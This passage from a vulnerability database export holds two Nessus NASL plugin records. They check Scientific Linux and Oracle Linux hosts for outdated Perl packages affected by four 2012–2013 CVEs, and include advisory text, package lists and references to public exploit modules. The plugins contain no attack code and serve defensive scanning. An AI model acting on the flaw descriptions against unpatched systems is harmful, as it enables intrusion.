(CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nAll running Perl programs must be restarted for this update to take\neffect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1303&L=scientific-linux-errata&T=0&P=6026\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5976fb39\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"TWiki 5.1.2 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Archive-Extract\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Archive-Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-CPAN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-CPANPLUS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Compress-Raw-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Compress-Raw-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Digest-SHA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-CBuilder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-Embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-MakeMaker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-ExtUtils-ParseXS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-File-Fetch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-IO-Compress-Base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-IO-Compress-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-IO-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-IO-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-IPC-Cmd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Locale-Maketext-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Log-Message\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Log-Message-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Module-Build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Module-CoreList\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Module-Load\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Module-Load-Conditional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Module-Loaded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Module-Pluggable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Object-Accessor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Package-Constants\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Params-Check\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Parse-CPAN-Meta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Pod-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Term-UI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Test-Harness\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Test-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Time-HiRes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Time-Piece\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-suidperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-version\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"perl-5.8.8-40.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"perl-debuginfo-5.8.8-40.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"perl-suidperl-5.8.8-40.el5_9\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"perl-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Archive-Extract-0.38-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Archive-Tar-1.58-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-CGI-3.51-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-CPAN-1.9402-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-CPANPLUS-0.88-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Compress-Raw-Bzip2-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Compress-Raw-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Compress-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Digest-SHA-5.47-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-ExtUtils-CBuilder-0.27-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-ExtUtils-Embed-1.28-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-ExtUtils-MakeMaker-6.55-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-ExtUtils-ParseXS-2.2003.0-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-File-Fetch-0.26-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-IO-Compress-Base-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-IO-Compress-Bzip2-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-IO-Compress-Zlib-2.020-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-IO-Zlib-1.09-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-IPC-Cmd-0.56-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Locale-Maketext-Simple-0.18-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Log-Message-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Log-Message-Simple-0.04-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Module-Build-0.3500-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Module-CoreList-2.18-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Module-Load-0.16-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Module-Load-Conditional-0.30-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Module-Loaded-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Module-Pluggable-3.90-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Object-Accessor-0.34-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Package-Constants-0.02-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Params-Check-0.26-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Parse-CPAN-Meta-1.40-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Pod-Escapes-1.04-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Pod-Simple-3.13-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Term-UI-0.20-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Test-Harness-3.17-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Test-Simple-0.92-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Time-HiRes-1.9721-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-Time-Piece-1.15-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-core-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-debuginfo-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-devel-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-libs-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-parent-0.221-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-suidperl-5.10.1-130.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perl-version-0.77-130.el6_4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl / perl-Archive-Extract / perl-Archive-Tar / perl-CGI / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T08:55:44", "description": "From Red Hat Security Advisory 2013:0685 :\n\nUpdated perl packages that fix multiple security issues now available\nfor Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting\nCVE-2012-5195 and CVE-2013-1667. Upstream acknowledges Tim Brown as\nthe original reporter of CVE-2012-5195 and Yves Orton as the original\nreporter of CVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.", "edition": 21, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 / 6 : perl (ELSA-2013-0685)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:perl-Archive-Tar", "p-cpe:/a:oracle:linux:perl-Module-Pluggable", "p-cpe:/a:oracle:linux:perl-libs", "p-cpe:/a:oracle:linux:perl-ExtUtils-MakeMaker", "p-cpe:/a:oracle:linux:perl-Parse-CPAN-Meta", "p-cpe:/a:oracle:linux:perl-version", "p-cpe:/a:oracle:linux:perl-Compress-Raw-Zlib", "p-cpe:/a:oracle:linux:perl-ExtUtils-CBuilder", "p-cpe:/a:oracle:linux:perl-Pod-Escapes", "p-cpe:/a:oracle:linux:perl-File-Fetch", "p-cpe:/a:oracle:linux:perl-Test-Harness", "p-cpe:/a:oracle:linux:perl-devel", "p-cpe:/a:oracle:linux:perl-IO-Compress-Bzip2", "p-cpe:/a:oracle:linux:perl-Params-Check", "p-cpe:/a:oracle:linux:perl-Log-Message-Simple", "p-cpe:/a:oracle:linux:perl-Module-Load-Conditional", "p-cpe:/a:oracle:linux:perl-Object-Accessor", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:perl-IO-Compress-Base", "p-cpe:/a:oracle:linux:perl-suidperl", "p-cpe:/a:oracle:linux:perl-Module-CoreList", "p-cpe:/a:oracle:linux:perl-Module-Load", "p-cpe:/a:oracle:linux:perl-IPC-Cmd", "p-cpe:/a:oracle:linux:perl-Time-Piece", "p-cpe:/a:oracle:linux:perl-Module-Loaded", "p-cpe:/a:oracle:linux:perl-Time-HiRes", "p-cpe:/a:oracle:linux:perl-Digest-SHA", "p-cpe:/a:oracle:linux:perl-Module-Build", "p-cpe:/a:oracle:linux:perl-IO-Compress-Zlib", "p-cpe:/a:oracle:linux:perl-CPANPLUS", "p-cpe:/a:oracle:linux:perl", "p-cpe:/a:oracle:linux:perl-Compress-Raw-Bzip2", "p-cpe:/a:oracle:linux:perl-Archive-Extract", "p-cpe:/a:oracle:linux:perl-IO-Zlib", "p-cpe:/a:oracle:linux:perl-Compress-Zlib", "p-cpe:/a:oracle:linux:perl-CGI", "p-cpe:/a:oracle:linux:perl-ExtUtils-Embed", "p-cpe:/a:oracle:linux:perl-Term-UI", "p-cpe:/a:oracle:linux:perl-ExtUtils-ParseXS", "p-cpe:/a:oracle:linux:perl-parent", "p-cpe:/a:oracle:linux:perl-Pod-Simple", "p-cpe:/a:oracle:linux:perl-core", "p-cpe:/a:oracle:linux:perl-CPAN", "p-cpe:/a:oracle:linux:perl-Package-Constants", "p-cpe:/a:oracle:linux:perl-Locale-Maketext-Simple", "p-cpe:/a:oracle:linux:perl-Test-Simple", "p-cpe:/a:oracle:linux:perl-Log-Message"], "id": "ORACLELINUX_ELSA-2013-0685.NASL", "href": "https://www.tenable.com/plugins/nessus/68797", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0685 and \n# Oracle Linux Security Advisory ELSA-2013-0685 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68797);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_bugtraq_id(56287, 56562, 56950, 58311);\n script_xref(name:\"RHSA\", value:\"2013:0685\");\n\n script_name(english:\"Oracle Linux 5 / 6 : perl (ELSA-2013-0685)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0685 :\n\nUpdated perl packages that fix multiple security issues now available\nfor Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nPerl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat\noperator, an attacker could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys and\nredistribution of hash content, handled certain input. If an attacker\nsupplied specially crafted input to be used as hash keys by a Perl\napplication, it could cause excessive memory consumption.\n(CVE-2013-1667)\n\nIt was found that the Perl CGI module, used to handle Common Gateway\nInterface requests and responses, incorrectly sanitized the values for\nSet-Cookie and P3P headers. If a Perl application using the CGI module\nreused cookies values and accepted untrusted input from web browsers,\na remote attacker could use this flaw to alter member items of the\ncookie or add new items. (CVE-2012-5526)\n\nIt was found that the Perl Locale::Maketext module, used to localize\nPerl applications, did not properly handle backslashes or\nfully-qualified method names. An attacker could possibly use this flaw\nto execute arbitrary Perl code with the privileges of a Perl\napplication that uses untrusted Locale::Maketext templates.\n(CVE-2012-6329)\n\nRed Hat would like to thank the Perl project for reporting\nCVE-2012-5195 and CVE-2013-1667. Upstream acknowledges Tim Brown as\nthe original reporter of CVE-2012-5195 and Yves Orton as the original\nreporter of CVE-2013-1667.\n\nAll Perl users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. All running Perl programs\nmust be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-March/003388.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-March/003389.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected perl packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Archive-Extract\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Archive-Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-CGI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-CPAN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-CPANPLUS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Compress-Raw-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Compress-Raw-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Digest-SHA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-ExtUtils-CBuilder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-ExtUtils-Embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-ExtUtils-MakeMaker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-ExtUtils-ParseXS\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-File-Fetch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-IO-Compress-Base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-IO-Compress-Bzip2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-IO-Compress-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-IO-Zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-IPC-Cmd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Locale-Maketext-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Log-Message\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Log-Message-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Module-Build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Module-CoreList\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Module-Load\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Module-Load-Conditional\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Module-Loaded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Module-Pluggable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Object-Accessor\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Package-Constants\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Params-Check\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Parse-CPAN-Meta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Pod-Escapes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Pod-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Term-UI\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Test-Harness\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Test-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Time-HiRes\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Time-Piece\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-parent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-suidperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-version\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) 